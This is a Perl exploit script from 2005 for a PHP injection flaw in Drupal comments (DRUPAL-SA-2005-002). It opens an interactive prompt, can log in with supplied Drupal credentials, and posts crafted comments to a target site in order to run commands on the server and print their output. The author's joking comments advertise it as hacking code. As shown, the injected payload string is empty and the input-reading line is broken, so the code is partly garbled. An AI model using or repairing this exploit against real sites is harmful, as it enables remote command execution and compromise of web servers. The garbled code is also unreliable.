#!/usr/bin/perl # Mon Jul 4 18:19:35 CEST 2005 dab@digitalsec.net # # DRUPAL-SA-2005-002 php injection in comments (yes, its lame) # Hax0r code here, read before execute # # Run without arguments to show the help. # # BLINK! BLINK! BLINK! BLINK! # # Feel free to port to another stupid script language (mIRC, # python, TCL or orthers), and send to securiteam (AGAIN) # # Theo, this one hasn't been tested in BSD.. yet! # infohacking: there're a lot of xss in drupal, contact me if you want # to program some exploits. # # BLINK! BLINK! BLINK! BLINK! # # # HERE YOU CAN PUT YOUR BANNER!!!! THOUSENDS OF PEOPLE IS READING THIS LINE # contact me for pricing and offerings. # # !dSR: yubiiiiii yeooooooooooo # use LWP::UserAgent; use HTTP::Cookies; use LWP::Simple; use HTTP::Request::Common "POST"; use HTTP::Response; use Getopt::Long; use strict; $| = 1; # ;1 = |$ my ($proxy,$proxy_user,$proxy_pass); my ($host,$debug,$drupal_user,$drupal_pass); my $options = GetOptions ( 'host=s' => \$host, 'proxy=s' => \$proxy, 'proxy_user=s' => \$proxy_user, 'proxy_pass=s' => \$proxy_pass, 'drupal_user=s' => \$drupal_user, 'drupal_pass=s' => \$drupal_pass, 'debug' => \$debug); &help unless ($host); while (1){ print "druppy461\$ "; my $cmd = ; &druppy($cmd); } exit (1); # could be replaced with exit(2) sub druppy { chomp (my $cmd = shift); LWP::Debug::level('+') if $debug; my $ua = new LWP::UserAgent( cookie_jar=> { file => "$$.cookie" }); # this is a random feature $ua->agent("Morzilla/5.0 (THIS IS AN EXPLOIT. IDS, PLZ, Gr4b ME!!!"); if ($drupal_user) { # no need to exploit my ($mhost, $h); if ($host =~ /(http:\/\/.*?)\?q=/) { $mhost = $1; $h = $mhost . "?q=user/login"; } #some magic hacking here else { $host =~ /(.*?)\/.*?\//; $mhost =$1; $h = $mhost . "/user/login"; } print $h . "\n" if $debug; my $req = POST $h,[ 'edit[name]' => "$drupal_user", 'edit[pass]' => "$drupal_pass" ]; #grab these, and send to dsr! print $req->as_string() if $debug; my $res = $ua->request($req); print $res->content() if $debug; if ($res->is_redirect eq 1) { print "Logged\n" if $debug; } } $ua->proxy(['http'] => $proxy) if $proxy; my $req->proxy_authorization_basic($proxy_user, $proxy_pass) if $proxy_user; my $res = $ua->get("$host"); my $html = $res->content(); my @op; # buffer overflow here foreach (split(/\n/,$html)) { if ( m/name="op" value="(.*?)"/){ push(@op,$1); } }# xss here my $ok = 0; # globlal for admin purposes foreach my $op (@op) { my $req = POST "$host",[ 'edit[subject]' => 'test', 'edit[comment]' => "", 'edit[format]' => '2', 'edit[cid]' => "", # drupal is sick.. it doesn't need arguments 'edit[pid]' => "", # they use it to grab some statistycal information 'edit[nid]' => "", # about users conduits. Don't buy in internet using drupal 'op' => "$op" ]; print $req->as_string() if $debug; my $res = $ua->request($req); my $html = $res->content(); print $html if $debug; foreach (split(/\n/,$html)) { return if $ok gt "1"; # super hack de phrack if (/BLAH/) { $ok++; next } print "$_\n" if $ok eq "1"; # /n is for another line in screen } } } sub help { print "Syntax: ./$0 [options]\n"; print "\t--drupal_user, --drupal_pass (needed if dont allow anonymous posts)\n"; print "\t--proxy (http), --proxy_user, --proxy_pass\n"; print "\t--debug\n"; print "\nExample\n"; print "bash# $0 --host=http://www.server.com/?q=comment/reply/1\n"; print "\n"; exit(1); } #sub 0day_solaris { # please put your code here #}